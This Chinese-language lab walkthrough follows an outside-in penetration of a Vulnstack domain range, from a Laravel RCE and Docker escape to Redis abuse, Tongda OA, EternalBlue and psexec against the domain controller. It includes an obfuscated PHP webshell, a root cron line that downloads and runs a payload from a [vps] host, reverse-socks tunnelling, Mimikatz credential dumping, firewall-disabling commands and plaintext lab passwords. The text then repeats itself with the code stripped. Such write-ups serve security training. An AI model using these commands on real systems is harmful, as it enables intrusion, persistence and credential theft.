从外到内的渗透测试实战教学文档

环境配置

靶场环境：三层网络域渗透靶场
目标域名：pentest.com

外网打点阶段

初始信息收集

直接访问目标站点发现是一个博客站点，无明显可利用点
进行端口扫描发现开放端口：
- 80端口：博客站点
- 81端口：Laravel应用 (v8.29.0, PHP v7.4.14)
- 6379端口：Redis服务

Laravel RCE漏洞利用

漏洞识别：Laravel <= v8.4.2 debug模式远程代码执行漏洞(CVE-2021-3129)
利用方法：
- 使用蚁剑webshell：
```
<?php $ant=create_function("", base64_decode('QGV2YWwoJF9QT1NUWyJhbnQiXSk7'));$ant();?>
```
- 成功获取WebShell：http://pentest.com:81/havefun.php (密码: ant)

容器环境识别与提权

识别Docker环境：
- 检查hostname：8e172820ac78
- 查看/proc/self/cgroup确认容器环境
容器内提权：
- 查找SUID文件：find / -perm -u=s -type f 2>/dev/null
- 发现/home/jobs/shell可执行文件
- 通过PATH环境变量劫持：
```
cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
export PATH=/tmp:$PATH
cd /home/jobs
./shell  # 获取root权限
```

Docker逃逸

特权模式逃逸：

mkdir /hack
mount /dev/sda1 /hack  # 挂载宿主机文件系统
echo '* * * * * wget -qO c2fun --no-check-certificate http://[vps]:8080/c2pen; chmod +x c2fun; ./c2fun' >> /hack/var/spool/cron/crontabs/root

Redis未授权访问利用

发现10.20.29.87:6379存在未授权访问
通过写入SSH公钥获取权限：
```
ssh root@10.20.29.87
```
确认该主机为DMZ区主机

内网横向移动

网络拓扑发现

获取到两个内网网段：
- 192.168.80.0/24
- 192.168.93.0/24

第二层网络渗透

使用EarthWorm代理内网流量：

攻击机执行：

./ew_linux_x64 -s rcsocks -l 1080 -e 7474

目标机执行：

nohup ./ew_linux_x64 -s rssocks -d [vps] -e 7474 &

扫描发现192.168.80.30开放8080端口
利用通达OA漏洞：
- 任意用户登录+文件上传+文件包含漏洞
- 上传蚁剑webshell获取权限

信息收集

ipconfig /all
systeminfo
route print
net view
arp -a
whoami
net start
net share
net config workstation
net user
net user /domain
net localgroup administrators
net view /domain
net group /domain
net group "domain admins" /domain

域环境分析

域名为：whoamianony.org
域控制器：DC.whoamianony.org (192.168.93.30)
域用户：
- bunny:Bunny2021
- Administrator:Whoami2021

抓取域凭据

使用Meterpreter的kiwi模块：

load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords

必要时迁移到x64进程

进攻第三层网络

路由设置

route add 192.168.93.0 255.255.255.0 14
route print

永恒之蓝利用

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.93.1-255
run

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.93.40
set payload windows/x64/meterpreter/bind_tcp
exploit

进攻域控制器

使用psexec横向移动

use exploit/windows/smb/psexec
set rhosts 192.168.93.30
set SMBUser Administrator
set SMBPass Whoami2021
set payload windows/meterpreter/bind_tcp
exploit

防火墙绕过

建立IPC连接：

net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"

远程关闭防火墙：

sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start unablefirewall

Cobalt Strike扩展操作

域内主机发现

beacon> net view

使用域凭据横向移动

转换到域管理员凭据
使用psexec攻击域控制器

总结

通过本次渗透测试，我们完成了：

外网打点：Laravel RCE → Docker逃逸 → Redis未授权
内网横向：通达OA漏洞 → 永恒之蓝 → 域凭据窃取
域控攻击：psexec横向移动
最终拿下5台主机(包括1台Docker容器)的全部权限。

靶场地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/9/

从外到内的渗透测试实战教学文档环境配置靶场环境：三层网络域渗透靶场目标域名：pentest.com 外网打点阶段初始信息收集直接访问目标站点发现是一个博客站点，无明显可利用点进行端口扫描发现开放端口： 80端口：博客站点 81端口：Laravel应用 (v8.29.0, PHP v7.4.14) 6379端口：Redis服务 Laravel RCE漏洞利用漏洞识别：Laravel <= v8.4.2 debug模式远程代码执行漏洞(CVE-2021-3129) 利用方法：使用蚁剑webshell：成功获取WebShell：http://pentest.com:81/havefun.php (密码: ant) 容器环境识别与提权识别Docker环境：检查hostname： 8e172820ac78 查看 /proc/self/cgroup 确认容器环境容器内提权：查找SUID文件： find / -perm -u=s -type f 2>/dev/null 发现 /home/jobs/shell 可执行文件通过PATH环境变量劫持： Docker逃逸特权模式逃逸： Redis未授权访问利用发现10.20.29.87:6379存在未授权访问通过写入SSH公钥获取权限：确认该主机为DMZ区主机内网横向移动网络拓扑发现获取到两个内网网段： 192.168.80.0/24 192.168.93.0/24 第二层网络渗透使用EarthWorm代理内网流量：攻击机执行：目标机执行：扫描发现192.168.80.30开放8080端口利用通达OA漏洞：任意用户登录+文件上传+文件包含漏洞上传蚁剑webshell获取权限信息收集域环境分析域名为：whoamianony.org 域控制器：DC.whoamianony.org (192.168.93.30) 域用户： bunny:Bunny2021 Administrator:Whoami2021 抓取域凭据使用Meterpreter的kiwi模块：必要时迁移到x64进程进攻第三层网络路由设置永恒之蓝利用进攻域控制器使用psexec横向移动防火墙绕过建立IPC连接：远程关闭防火墙： Cobalt Strike扩展操作域内主机发现使用域凭据横向移动转换到域管理员凭据使用psexec攻击域控制器总结通过本次渗透测试，我们完成了：外网打点：Laravel RCE → Docker逃逸 → Redis未授权内网横向：通达OA漏洞 → 永恒之蓝 → 域凭据窃取域控攻击：psexec横向移动最终拿下5台主机(包括1台Docker容器)的全部权限。靶场地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/9/